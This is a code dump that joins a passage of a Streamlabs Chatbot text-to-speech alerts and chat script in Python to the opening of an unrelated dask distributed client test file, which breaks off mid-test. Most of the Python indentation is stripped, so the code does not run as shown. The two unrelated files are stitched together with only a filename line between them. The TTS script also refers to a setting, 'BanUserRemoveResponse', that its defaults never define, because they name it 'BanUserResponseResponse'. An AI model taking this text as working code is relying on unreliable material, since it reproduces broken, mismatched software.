self.MixerSubDelay = 0
self.MixerSubMessage = "{name} has subscribed ({tier})."
self.MixerResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.StreamlabsOnDonation = False
self.StreamlabsIncludeDonationMessage = True
self.StreamlabsDonationMinimum = 1
self.StreamlabsDonationDelay = 0
self.StreamlabsDonationMessage = "{name} donated {amount}."
self.TwitchOnCheer = False
self.TwitchIncludeCheerMessage = True
self.TwitchCheerMinimum = 100
self.TwitchCheerDelay = 0
self.TwitchCheerMessage = "{name} has used {amount} bit{isPlural}."
self.TwitchOnFollow = False
self.TwitchFollowDelay = 0
self.TwitchFollowMessage = "{name} has followed."
self.TwitchOnHost = False
self.TwitchHostMinimum = 0
self.TwitchHostDelay = 0
self.TwitchHostMessage = "{name} has hosted you with {amount} viewer{isPlural}."
self.TwitchOnRaid = False
self.TwitchRaidMinimum = 0
self.TwitchRaidDelay = 0
self.TwitchRaidMessage = "{name} has raided you with a party of {amount}."
self.TwitchOnSub = False
self.TwitchIncludeSubMessage = True
self.TwitchSubDelay = 0
self.TwitchSubMessage = "{name} has subscribed ({tier})."
self.TwitchResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.TwitchGiftMessage = "{gifter} has gifted a sub ({tier}) to {name} ({months} month{isPlural})."
self.TwitchGiftMassMessage = "{gifter} has gifted {amount} subs to the channel: {recipients}."
self.YoutubeOnFollow = False
self.YoutubeFollowDelay = 0
self.YoutubeFollowMessage = "{name} has followed."
self.YoutubeOnSub = False
self.YoutubeIncludeSubMessage = True
self.YoutubeSubDelay = 0
self.YoutubeSubMessage = "{name} has subscribed ({tier})."
self.YoutubeResubMessage = "{name} has resubscribed ({tier}) for {months} months."
self.YoutubeOnSuperchat = False
self.YoutubeIncludeSuperchatMessage = True
self.YoutubeSuperchatMinimum = 5
self.YoutubeSuperchatDelay = 0
self.YoutubeSuperchatMessage = "{name} donated {amount}."
self.BanUserCommand = "!banuser"
self.BanUserCommandPermission = "Caster"
self.BanUserCommandPermissionInfo = ""
self.BanUserAddResponse = "The user was banned from using TTS."
self.BanUserResponseResponse = "The user is now able to use TTS."
self.BanWordCommand = "!banword"
self.BanWordCommandPermission = "Caster"
self.BanWordCommandPermissionInfo = ""
self.BanWordAddResponse = "The word was added to the banned words list."
self.BanWordRemoveResponse = "The word was removed from the banned words list."
self.BannedAction = "Skip Messages with Banned Words"
self.BannedActionBoolean = True
self.BannedMatchWholeWord = True
self.BannedReplacement = ""
self.SocketToken = None
def Reload(self, jsondata):
""" Reload settings from Streamlabs user interface by given json data. """
self.__dict__ = json.loads(jsondata, encoding="utf-8")
def Save(self, settingsfile):
""" Save settings contained within to .json and .js settings files. """
try:
with codecs.open(settingsfile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8", ensure_ascii=False)
with codecs.open(settingsfile.replace("json", "js"), encoding="utf-8-sig", mode="w+") as f:
f.write("var settings = {0};".format(json.dumps(self.__dict__, encoding='utf-8', ensure_ascii=False)))
except:
Parent.Log(ScriptName, "Failed to save settings to file.")
class UIConfig(object):
""" Load in saved settings file if available else set default values. """
def __init__(self, uiconfigfile=None):
try:
with codecs.open(uiconfigfile, encoding="utf-8-sig", mode="r") as f:
self.__dict__ = json.load(f, encoding="utf-8", object_pairs_hook=OrderedDict)
except:
Parent.SendStreamWhisper(Parent.GetChannelName(), "Failed to read UIConfig file: " + str(sys.exc_info()[1]))
def Save(self, uiconfigfile):
""" Save UI Config contained within to .json file. """
if len(self.__dict__) > 0:
try:
with codecs.open(uiconfigfile, encoding="utf-8-sig", mode="w+") as f:
json.dump(self.__dict__, f, encoding="utf-8", ensure_ascii=False)
except:
Parent.SendStreamWhisper(Parent.GetChannelName(), "Failed to save ui config to file.")
#---------------------------------------
# Event Receiver Functions
#---------------------------------------
def EventReceiverConnected(sender, args):
Parent.Log(ScriptName, "Connected")
return
def EventReceiverDisconnected(sender, args):
Parent.Log(ScriptName, "Disconnected")
def EventReceiverEvent(sender, args):
handleEvent(sender,args)
def handleEvent(sender, args):
# Grab all the data from the event
evntdata = args.Data
# Check if it contains data and for what streaming service it is
if evntdata and evntdata.For == "twitch_account":
if evntdata.Type == "follow" and ScriptSettings.TwitchOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.TwitchFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchFollowDelay)
elif evntdata.Type == "bits" and ScriptSettings.TwitchOnCheer:
s = ''
for message in evntdata.Message:
if message.Amount >= ScriptSettings.TwitchCheerMinimum:
if message.Amount > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchCheerMessage.format(name=message.Name, amount=message.Amount, isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchCheerDelay, ScriptSettings.TwitchIncludeCheerMessage, message.Message, message.Name)
elif evntdata.Type == "host" and ScriptSettings.TwitchOnHost:
s = ''
for message in evntdata.Message:
if int(message.Viewers) >= ScriptSettings.TwitchHostMinimum:
if message.Viewers > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchHostMessage.format(name=message.Name, amount=str(message.Viewers), isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchHostDelay)
elif evntdata.Type == "raid" and ScriptSettings.TwitchOnRaid:
for message in evntdata.Message:
if int(message.Raiders) >= ScriptSettings.TwitchRaidMinimum:
ttsMessage = ScriptSettings.TwitchRaidMessage.format(name=message.Name, amount=str(message.Raiders))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchRaidDelay)
elif evntdata.Type == "subscription" and ScriptSettings.TwitchOnSub:
try:
s = ''
if len(evntdata.Message) > 1 and evntdata.Message[0].Gifter:
names = []
for message in evntdata.Message:
names.append(message.Name)
giftees = ', '.join(names)
ttsMessage = ScriptSettings.TwitchGiftMassMessage.format(recipients=giftees, gifter=message.Gifter, amount=len(names))
else:
for message in evntdata.Message:
tier = SubPlanMap[str(message.SubPlan)]
ttsMessage = ''
if message.Gifter:
if message.Months > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.TwitchGiftMessage.format(name=message.Name, gifter=message.Gifter, tier=tier, months=message.Months, isPlural=s)
else:
if message.Months == 1:
ttsMessage = ScriptSettings.TwitchSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.TwitchResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.TwitchSubDelay, ScriptSettings.TwitchIncludeSubMessage, message.Message, message.Name)
except Exception as e:
Parent.SendStreamWhisper(Parent.GetChannelName(), 'Failed to process subscription. Please see logs (i).')
Parent.Log(ScriptName, str(e.args))
elif evntdata and evntdata.For == "mixer_account":
if evntdata.Type == "follow" and ScriptSettings.MixerOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.MixerFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerFollowDelay)
elif evntdata.Type == "subscription" and ScriptSettings.MixerOnSub:
for message in evntdata.Message:
                ttsMessage = ''
                # Assumption: Mixer events do not expose a Twitch-style SubPlan here, so an
                # empty tier is passed to avoid referencing an undefined name.
                tier = ''
                if message.Months == 1:
ttsMessage = ScriptSettings.MixerSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.MixerResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerSubDelay, ScriptSettings.MixerIncludeSubMessage, message.Message, message.Name)
elif evntdata.Type == "host" and ScriptSettings.MixerOnHost:
s = ''
for message in evntdata.Message:
if int(message.Viewers) >= ScriptSettings.MixerHostMinimum:
                if int(message.Viewers) > 1:
s = 's'
else:
s = ''
ttsMessage = ScriptSettings.MixerHostMessage.format(name=message.Name, amount=str(message.Viewers), isPlural=s)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.MixerHostDelay)
elif evntdata and evntdata.For == "streamlabs":
if evntdata.Type == "donation" and ScriptSettings.StreamlabsOnDonation:
for message in evntdata.Message:
if float(message.Amount) >= ScriptSettings.StreamlabsDonationMinimum:
ttsMessage = ScriptSettings.StreamlabsDonationMessage.format(name=message.Name, amount=str(message.FormattedAmount))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.StreamlabsDonationDelay, ScriptSettings.StreamlabsIncludeDonationMessage, message.Message, message.Name)
elif evntdata and evntdata.For == "youtube_account":
if evntdata.Type == "follow" and ScriptSettings.YoutubeOnFollow:
for message in evntdata.Message:
ttsMessage = ScriptSettings.YoutubeFollowMessage.format(name=message.Name)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeFollowDelay)
elif evntdata.Type == "subscription" and ScriptSettings.YoutubeOnSub:
for message in evntdata.Message:
                ttsMessage = ''
                # Assumption: as with Mixer, no SubPlan is available for YouTube memberships,
                # so an empty tier is passed to avoid referencing an undefined name.
                tier = ''
                if message.Months == 1:
ttsMessage = ScriptSettings.YoutubeSubMessage.format(name=message.Name, tier=tier, months=message.Months)
else:
ttsMessage = ScriptSettings.YoutubeResubMessage.format(name=message.Name, tier=tier, months=message.Months)
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeSubDelay)
elif evntdata.Type == "superchat" and ScriptSettings.YoutubeOnSuperchat:
for message in evntdata.Message:
if float(message.Amount) >= ScriptSettings.YoutubeSuperchatMinimum:
ttsMessage = ScriptSettings.YoutubeSuperchatMessage.format(name=message.Name, amount=str(message.FormattedAmount))
SendTTSMessagesWithDelay(ttsMessage, ScriptSettings.YoutubeSuperchatDelay, ScriptSettings.YoutubeIncludeSuperchatMessage, message.Message, message.Name)
#---------------------------------------
# Script Functions
#---------------------------------------
def updateUIConfig():
voices = []
for voice in spk.GetInstalledVoices():
info = voice.VoiceInfo
voices.append(info.Name)
UIConfigs = UIConfig(UIConfigFile)
UIConfigs.VoiceName['items'] = voices
if ScriptSettings.VoiceName not in voices:
ScriptSettings.VoiceName = ''
ScriptSettings.Save(SettingsFile)
UIConfigs.Save(UIConfigFile)
def updateBannedSettings():
    global ScriptSettings, reBanned, bannedWords, bannedUsers
    ScriptSettings.BannedActionBoolean = (ScriptSettings.BannedAction == 'Skip Messages with Banned Words')
    # Ignore blank entries; an empty alternative would make the pattern match everywhere.
    words = [w for w in bannedWords if w]
    if not words:
        # Nothing banned: use a pattern that can never match.
        reBanned = re.compile(r"(?!x)x")
    elif ScriptSettings.BannedMatchWholeWord:
        reBanned = re.compile(r"\b({0})\b".format('|'.join(words)), re.IGNORECASE)
    else:
        reBanned = re.compile(r"({0})".format('|'.join(words)), re.IGNORECASE)
def SendOverlayUpdate(message):
""" Send updated information to the overlay. """
message = message.encode('utf8', 'replace')
payload = {
'message': message,
'time': ScriptSettings.TTSOverlayTime,
'fontColor': ScriptSettings.TTSOverlayFontColor,
'useOutline': ScriptSettings.TTSOverlayUseFontOutline,
'fontOutline': ScriptSettings.TTSOverlayFontOutline,
'useShadow': ScriptSettings.TTSOverlayUseFontShadow,
'fontShadow': ScriptSettings.TTSOverlayFontShadow,
'fontSize': ScriptSettings.TTSOverlayFontSize,
'font': ScriptSettings.TTSOverlayFont,
'useBackground': ScriptSettings.TTSOverlayUseBackground,
'background': ScriptSettings.TTSOverlayBackgroundColor,
'useBorder': ScriptSettings.TTSOverlayUseBorder,
'border': ScriptSettings.TTSOverlayBorderColor,
'horizontalAlign': ScriptSettings.TTSOverlayHorizontalAlign,
'verticalAlign': ScriptSettings.TTSOverlayVerticalAlign,
'animateIn': ScriptSettings.TTSOverlayAnimateIn,
'animateOut': ScriptSettings.TTSOverlayAnimateOut,
}
Parent.BroadcastWsEvent("EVENT_TTS_AC_OVERLAY", json.dumps(payload))
def SendTTSMessage(voice, message, isAlert, user = '', text = '', displayName = ''):
if user and user in bannedUsers:
return
if user and not text:
text = message
if not isAlert and user and ScriptSettings.MaxCharacters != 0 and len(message) > ScriptSettings.MaxCharacters:
Parent.SendStreamMessage(ScriptSettings.MaxCharacterMessage.format(user=displayName))
return
if ScriptSettings.BannedActionBoolean:
if bool(reBanned.search(message)):
return
else:
message = reBanned.sub(ScriptSettings.BannedReplacement, message)
text = reBanned.sub(ScriptSettings.BannedReplacement, text)
displayName = reBanned.sub(ScriptSettings.BannedReplacement, displayName)
try:
if (isAlert and not ScriptSettings.TTSOverlayExcludeAlerts) or (not isAlert and not user):
SendOverlayUpdate(message)
elif not isAlert:
SendOverlayUpdate(ScriptSettings.TTSOverlayMessage.format(user=displayName, message=text))
voice.Speak(message)
except Exception as e:
Parent.SendStreamWhisper(Parent.GetChannelName(), 'TTS Failed, please see the script logs (i).')
Parent.Log(ScriptName, str(e.args))
def SendTTSMessagesWithDelay(message, delay, includeExtra = False, extraMessage = '', user = ''):
if delay > 0:
time.sleep(delay)
global spk
SendTTSMessage(spk, message, True)
if includeExtra:
SendTTSMessage(spk, extraMessage, False, user)
def readFileArray(fileToRead):
lines = []
with open(fileToRead) as f:
lines = f.readlines()
lines = [x.strip().decode("utf-8", "replace") for x in lines]
return lines
def writeArrayToFile(arrayToWrite, fileToWrite):
with open(fileToWrite, 'w') as f:
f.write('\n'.join(arrayToWrite).encode('utf8', 'replace'))
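# File format assumed by readFileArray/writeArrayToFile: one banned word/phrase or
# username per line, UTF-8 encoded. Hypothetical example contents:
#
#   kappa
#   some banned phrase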
def handleBanUser(data, user):
global bannedUsers
if user in bannedUsers:
bannedUsers.remove(user)
Parent.SendStreamMessage(ScriptSettings.BanUserRemoveResponse.format(user=data.UserName, banned=user))
else:
bannedUsers.append(user)
Parent.SendStreamMessage(ScriptSettings.BanUserAddResponse.format(user=data.UserName, banned=user))
writeArrayToFile(bannedUsers, BannedUserFile)
#---------------------------------------
# Chatbot Initialize Function
#---------------------------------------
def Init():
# Load settings from file and verify
global ScriptSettings
ScriptSettings = Settings(SettingsFile)
global spk
spk = SpeechSynthesizer()
spk.Rate = ScriptSettings.Rate
spk.Volume = ScriptSettings.Volume
updateUIConfig()
global bannedWords, bannedUsers
bannedUsers = readFileArray(BannedUserFile)
bannedWords = readFileArray(BannedWordFile)
updateBannedSettings()
if ScriptSettings.VoiceName != '':
spk.SelectVoice(ScriptSettings.VoiceName)
# Init the Streamlabs Event Receiver
global EventReceiver
EventReceiver = StreamlabsEventClient()
EventReceiver.StreamlabsSocketConnected += EventReceiverConnected
EventReceiver.StreamlabsSocketDisconnected += EventReceiverDisconnected
EventReceiver.StreamlabsSocketEvent += EventReceiverEvent
# Auto Connect if key is given in settings
if ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
# End of Init
return
#---------------------------------------
# Chatbot Save Settings Function
#---------------------------------------
def ReloadSettings(jsondata):
# Reload newly saved settings and verify
ScriptSettings.Reload(jsondata)
updateBannedSettings()
if ScriptSettings.VoiceName != '':
global spk
spk.SelectVoice(ScriptSettings.VoiceName)
spk.Rate = ScriptSettings.Rate
spk.Volume = ScriptSettings.Volume
global EventReceiver
if not EventReceiver.IsConnected and ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
elif EventReceiver.IsConnected and not ScriptSettings.SocketToken:
EventReceiver.Disconnect()
# End of ReloadSettings
return
#---------------------------------------
# Chatbot Script Unload Function
#---------------------------------------
def Unload():
global EventReceiver
if EventReceiver.IsConnected:
EventReceiver.Disconnect()
EventReceiver = None
#---------------------------
# [Optional] ScriptToggled (Notifies you when a user disables your script or enables it)
#---------------------------
def ScriptToggled(state):
global EventReceiver
if not state and EventReceiver.IsConnected:
EventReceiver.Disconnect()
elif state and not EventReceiver.IsConnected and ScriptSettings.SocketToken:
EventReceiver.Connect(ScriptSettings.SocketToken)
return
#---------------------------------------
# Chatbot Execute Function
#---------------------------------------
def Execute(data):
if data.IsChatMessage():
command = data.GetParam(0)
if command == ScriptSettings.TTSCommand and IsFromValidSource(data, ScriptSettings.TTSCommandUsage, ScriptSettings.TTSCommandUsageReply, ScriptSettings.TTSCommandUsageReplyMessage):
if HasPermission(data, ScriptSettings.TTSCommandPermission, ScriptSettings.TTSCommandPermissionInfo):
if not IsOnCooldown(data, ScriptSettings.TTSCommand, ScriptSettings.TTSCasterCD, ScriptSettings.TTSUseCD, ScriptSettings.TTSOnCooldown, ScriptSettings.TTSOnUserCooldown):
if HasCurrency(data, ScriptSettings.TTSCommandCost):
commandOffset = len(ScriptSettings.TTSCommand) + 1
text = data.Message[commandOffset:]
message = ScriptSettings.TTSCommandMessage.format(user=data.UserName, message=text)
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, message, False, data.UserName.lower(), text, data.UserName))
messageThread.daemon = True
messageThread.start()
Parent.AddUserCooldown(ScriptName, ScriptSettings.TTSCommand, data.User, ScriptSettings.TTSUserCooldown)
Parent.AddCooldown(ScriptName, ScriptSettings.TTSCommand, ScriptSettings.TTSCooldown)
elif command == ScriptSettings.BanWordCommand and HasPermission(data, ScriptSettings.BanWordCommandPermission, ScriptSettings.BanWordCommandPermissionInfo) and data.GetParamCount() > 1:
message = data.GetParam(1)
i = 2
while i < data.GetParamCount():
message = message + ' ' + data.GetParam(i)
i = i + 1
if message:
global bannedWords
                if message in bannedWords:
                    bannedWords.remove(message)
                    Parent.SendStreamMessage(ScriptSettings.BanWordRemoveResponse.format(user=data.UserName, word=message))
                else:
                    bannedWords.append(message)
                    Parent.SendStreamMessage(ScriptSettings.BanWordAddResponse.format(user=data.UserName, word=message))
writeArrayToFile(bannedWords, BannedWordFile)
updateBannedSettings()
elif command == ScriptSettings.BanUserCommand and HasPermission(data, ScriptSettings.BanUserCommandPermission, ScriptSettings.BanUserCommandPermissionInfo) and data.GetParamCount() > 1:
user = data.GetParam(1).lower()
if user:
handleBanUser(data, user)
                if data.GetParamCount() > 2:
                    duration = data.GetParam(2)
                    if duration.isdigit():
                        # Temporary ban: handleBanUser toggles, so this second call un-bans after the delay.
                        banThread = threading.Timer(int(duration), handleBanUser, args=(data, user))
                        banThread.daemon = True
                        banThread.start()
if ScriptSettings.TTSAllChat and IsFromValidSource(data, ScriptSettings.TTSAllChatUsage, ScriptSettings.TTSAllChatUsageReply, ScriptSettings.TTSAllChatUsageReplyMessage):
            if not ScriptSettings.TTSAllChatExcludeCommands or not command.startswith('!'):
if "msg-id=highlighted-message" in data.RawData:
message = ScriptSettings.TTSAllChatMessage.format(user=data.UserName, message=data.Message)
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, message, False, data.UserName.lower(), data.Message, data.UserName))
messageThread.daemon = True
messageThread.start()
# End of execute
return
#---------------------------------------
# Chatbot Execute Helper Functions
#---------------------------------------
def SendResp(data, Message):
"""Sends message to Stream or discord chat depending on settings"""
if not data.IsFromDiscord() and not data.IsWhisper():
Parent.SendStreamMessage(Message)
if not data.IsFromDiscord() and data.IsWhisper():
Parent.SendStreamWhisper(data.User, Message)
if data.IsFromDiscord() and not data.IsWhisper():
Parent.SendDiscordMessage(Message)
if data.IsFromDiscord() and data.IsWhisper():
Parent.SendDiscordDM(data.User, Message)
def IsFromValidSource(data, Usage, SendResponse, UsageResponse):
"""Return true or false depending on the message is sent from
a source that's in the usage setting or not"""
usedDiscord = data.IsFromDiscord()
usedWhisper = data.IsWhisper()
if not usedDiscord:
l = ["Stream Chat", "Chat Both", "All", "Stream Both"]
if not usedWhisper and (Usage in l):
return True
l = ["Stream Whisper", "Whisper Both", "All", "Stream Both"]
if usedWhisper and (Usage in l):
return True
if usedDiscord:
l = ["Discord Chat", "Chat Both", "All", "Discord Both"]
if not usedWhisper and (Usage in l):
return True
l = ["Discord Whisper", "Whisper Both", "All", "Discord Both"]
if usedWhisper and (Usage in l):
return True
if SendResponse:
message = UsageResponse.format(user=data.UserName, usage=Usage)
SendResp(data, message)
return False
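# Illustrative outcomes for IsFromValidSource (hypothetical inputs, derived from the lists above):
#   stream chat message, Usage = "Stream Chat" -> True
#   stream whisper,      Usage = "Stream Chat" -> False ("Stream Chat" does not cover whispers)
#   Discord chat,        Usage = "Chat Both"   -> True
#   Discord DM,          Usage = "All"         -> True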
def HasPermission(data, permission, permissionInfo):
"""Returns true if user has permission and false if user doesn't"""
if not Parent.HasPermission(data.User, permission, permissionInfo):
return False
return True
def IsOnCooldown(data, command, casterCD, useCD, cooldownMessage, userCooldownMessage):
"""Return true if command is on cooldown and send cooldown message if enabled"""
#introduce globals for cooldown management
cooldown = Parent.IsOnCooldown(ScriptName, command)
userCooldown = Parent.IsOnUserCooldown(ScriptName, command, data.User)
caster = (Parent.HasPermission(data.User, "Caster", "") and casterCD)
#check if command is on cooldown
if (cooldown or userCooldown) and caster is False:
#check if cooldown message is enabled
if useCD:
#set variables for cooldown
cooldownDuration = Parent.GetCooldownDuration(ScriptName, command)
userCDD = Parent.GetUserCooldownDuration(ScriptName, command, data.User)
#check for the longest CD!
if cooldownDuration > userCDD:
#set cd remaining
m_CooldownRemaining = cooldownDuration
#send cooldown message
message = cooldownMessage.format(user=data.UserName, cooldown=m_CooldownRemaining)
SendResp(data, message)
else: #set cd remaining
m_CooldownRemaining = userCDD
#send usercooldown message
message = userCooldownMessage.format(user=data.UserName, cooldown=m_CooldownRemaining)
SendResp(data, message)
return True
return False
def HasCurrency(data, cost):
if (cost == 0) or (Parent.RemovePoints(data.User, data.UserName, cost)):
return True
return False
#---------------------------------------
# Chatbot Tick Function
#---------------------------------------
def Tick():
# End of Tick
return
#---------------------------------------
# Chatbot Parameter Parser
#---------------------------------------
def Parse(parseString, user, target, message):
result = RegTTS.search(parseString)
if result:
paramMessage = result.group(0)
ttsMessage = result.group("message")
parseString = parseString.replace(paramMessage, "")
messageThread = threading.Thread(target=SendTTSMessage, args=(spk, ttsMessage, False))
messageThread.daemon = True
messageThread.start()
    # Return parseString with the TTS parameter stripped out (unaltered if no match)
return parseString
#---------------------------------------
# Chatbot Button Function
#---------------------------------------
def OpenOverlayFolder():
"""Open the overlay folder in the scripts folder"""
os.startfile(os.path.join(os.path.dirname(__file__), "overlay"))
def OpenReadMe():
"""Open the README.txt in the scripts folder"""
os.startfile(os.path.join(os.path.dirname(__file__), "README.txt"))
def OpenBannedWordFile():
"""Open the banned.txt in the scripts folder"""
os.startfile(BannedWordFile)
def OpenBannedUserFile():
"""Open the users.txt in the scripts folder"""
os.startfile(BannedUserFile)
def OpenAnimateDemo():
"""Open Animation Demo Website"""
OpenLink("https://daneden.github.io/animate.css/")
def OpenSocketToken():
"""Open Streamlabs API Settings"""
OpenLink("https://streamlabs.com/dashboard#/settings/api-settings")
def OpenOriginalGithubRepository():
"""Open the GitHub Repository for this script"""
OpenLink("https://github.com/kruiser8/TTS-Alerts-And-Chat")
def OpenTwitter():
"""Open the Twitter of the original author"""
OpenLink("https://twitter.com/kruiser8")
def OpenBlog():
"""Open fixel.ru"""
OpenLink("https://fixel.ru/")
def OpenLink(link):
"""Open links through buttons in UI"""
os.system("explorer " + link)
test_client.py
import asyncio
import gc
import logging
import os
import pickle
import random
import subprocess
import sys
import threading
import traceback
import warnings
import weakref
import zipfile
from collections import deque
from contextlib import suppress
from functools import partial
from operator import add
from threading import Semaphore
from time import sleep
import psutil
import pytest
from tlz import concat, first, identity, isdistinct, merge, pluck, valmap
import dask
import dask.bag as db
from dask import delayed
from dask.optimization import SubgraphCallable
from dask.utils import stringify
from distributed import (
CancelledError,
Executor,
LocalCluster,
Nanny,
TimeoutError,
Worker,
fire_and_forget,
get_client,
get_worker,
performance_report,
profile,
secede,
)
from distributed.client import (
Client,
Future,
_get_global_client,
as_completed,
default_client,
futures_of,
get_task_metadata,
temp_default_client,
tokenize,
wait,
)
from distributed.comm import CommClosedError
from distributed.compatibility import MACOS, WINDOWS
from distributed.core import Status
from distributed.metrics import time
from distributed.scheduler import CollectTaskMetaDataPlugin, KilledWorker, Scheduler
from distributed.sizeof import sizeof
from distributed.utils import is_valid_xml, mp_context, sync, tmp_text, tmpfile
from distributed.utils_test import ( # noqa: F401
TaskStateMetadataPlugin,
a,
async_wait_for,
asyncinc,
b,
captured_logger,
cleanup,
)
from distributed.utils_test import client as c # noqa: F401
from distributed.utils_test import client_secondary as c2 # noqa: F401
from distributed.utils_test import ( # noqa: F401
cluster,
cluster_fixture,
dec,
div,
double,
gen_cluster,
gen_test,
geninc,
inc,
loop,
loop_in_thread,
map_varying,
nodebug,
popen,
pristine_loop,
randominc,
s,
save_sys_modules,
slowadd,
slowdec,
slowinc,
throws,
varying,
wait_for,
)
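# The tests below are pytest/asyncio based. A minimal way to run a subset locally
# (the path is an assumption about the repository layout):
#
#   python -m pytest distributed/tests/test_client.py -k "submit or gather" -v
#
# The @gen_cluster decorator used throughout starts an in-process scheduler and workers
# and passes them (plus a client when client=True) into each coroutine test.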
@gen_cluster(client=True, timeout=None)
async def test_submit(c, s, a, b):
x = c.submit(inc, 10)
assert not x.done()
assert isinstance(x, Future)
assert x.client is c
result = await x
assert result == 11
assert x.done()
y = c.submit(inc, 20)
z = c.submit(add, x, y)
result = await z
assert result == 11 + 21
s.validate_state()
@gen_cluster(client=True)
async def test_map(c, s, a, b):
L1 = c.map(inc, range(5))
assert len(L1) == 5
assert isdistinct(x.key for x in L1)
assert all(isinstance(x, Future) for x in L1)
result = await L1[0]
assert result == inc(0)
assert len(s.tasks) == 5
L2 = c.map(inc, L1)
result = await L2[1]
assert result == inc(inc(1))
assert len(s.tasks) == 10
# assert L1[0].key in s.tasks[L2[0].key]
total = c.submit(sum, L2)
result = await total
assert result == sum(map(inc, map(inc, range(5))))
L3 = c.map(add, L1, L2)
result = await L3[1]
assert result == inc(1) + inc(inc(1))
L4 = c.map(add, range(3), range(4))
results = await c.gather(L4)
assert results == list(map(add, range(3), range(4)))
def f(x, y=10):
return x + y
L5 = c.map(f, range(5), y=5)
results = await c.gather(L5)
assert results == list(range(5, 10))
y = c.submit(f, 10)
L6 = c.map(f, range(5), y=y)
results = await c.gather(L6)
assert results == list(range(20, 25))
s.validate_state()
@gen_cluster(client=True)
async def test_map_empty(c, s, a, b):
L1 = c.map(inc, [], pure=False)
assert len(L1) == 0
results = await c.gather(L1)
assert results == []
@gen_cluster(client=True)
async def test_map_keynames(c, s, a, b):
futures = c.map(inc, range(4), key="INC")
assert all(f.key.startswith("INC") for f in futures)
assert isdistinct(f.key for f in futures)
futures2 = c.map(inc, [5, 6, 7, 8], key="INC")
assert [f.key for f in futures] != [f.key for f in futures2]
keys = ["inc-1", "inc-2", "inc-3", "inc-4"]
futures = c.map(inc, range(4), key=keys)
assert [f.key for f in futures] == keys
@gen_cluster(client=True)
async def test_map_retries(c, s, a, b):
args = [
[ZeroDivisionError("one"), 2, 3],
[4, 5, 6],
[ZeroDivisionError("seven"), ZeroDivisionError("eight"), 9],
]
x, y, z = c.map(*map_varying(args), retries=2)
assert await x == 2
assert await y == 4
assert await z == 9
x, y, z = c.map(*map_varying(args), retries=1, pure=False)
assert await x == 2
assert await y == 4
with pytest.raises(ZeroDivisionError, match="eight"):
await z
x, y, z = c.map(*map_varying(args), retries=0, pure=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 4
with pytest.raises(ZeroDivisionError, match="seven"):
await z
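# Note on the varying()/map_varying() helpers used above (from distributed.utils_test):
# varying(seq) builds a callable that returns the next element of seq on each call,
# raising it when that element is an exception instance. Combined with retries=N this
# makes a task fail deterministically a fixed number of times before succeeding.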
@gen_cluster(client=True)
async def test_map_batch_size(c, s, a, b):
result = c.map(inc, range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(1, 101))
result = c.map(add, range(100), range(100), batch_size=10)
result = await c.gather(result)
assert result == list(range(0, 200, 2))
# mismatch shape
result = c.map(add, range(100, 200), range(10), batch_size=2)
result = await c.gather(result)
assert result == list(range(100, 120, 2))
@gen_cluster(client=True)
async def test_custom_key_with_batches(c, s, a, b):
""" Test of <https://github.com/dask/distributed/issues/4588>"""
futs = c.map(
lambda x: x ** 2,
range(10),
batch_size=5,
key=[str(x) for x in range(10)],
)
assert len(futs) == 10
await wait(futs)
@gen_cluster(client=True)
async def test_compute_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check for varying() use
x = c.compute(delayed(varying(args))())
with pytest.raises(ZeroDivisionError, match="one"):
await x
# Same retries for all
x = c.compute(delayed(varying(args))(), retries=1)
with pytest.raises(ZeroDivisionError, match="two"):
await x
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
args.append(4)
x = c.compute(delayed(varying(args))(), retries=2)
assert await x == 3
@gen_cluster(client=True)
async def test_compute_retries_annotations(c, s, a, b):
# Per-future retries
xargs = [ZeroDivisionError("one"), ZeroDivisionError("two"), 30, 40]
yargs = [ZeroDivisionError("five"), ZeroDivisionError("six"), 70]
zargs = [80, 90, 100]
with dask.annotate(retries=2):
x = delayed(varying(xargs))()
y = delayed(varying(yargs))()
x, y = c.compute([x, y], optimize_graph=False)
gc.collect()
assert await x == 30
with pytest.raises(ZeroDivisionError, match="five"):
await y
x = delayed(varying(xargs))()
with dask.annotate(retries=2):
y = delayed(varying(yargs))()
z = delayed(varying(zargs))()
x, y, z = c.compute([x, y, z], optimize_graph=False)
with pytest.raises(ZeroDivisionError, match="one"):
await x
assert await y == 70
assert await z == 80
def test_retries_get(c):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
assert x.compute(retries=5) == 3
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
x = delayed(varying(args))()
with pytest.raises(ZeroDivisionError):
x.compute()
@gen_cluster(client=True)
async def test_compute_persisted_retries(c, s, a, b):
args = [ZeroDivisionError("one"), ZeroDivisionError("two"), 3]
# Sanity check
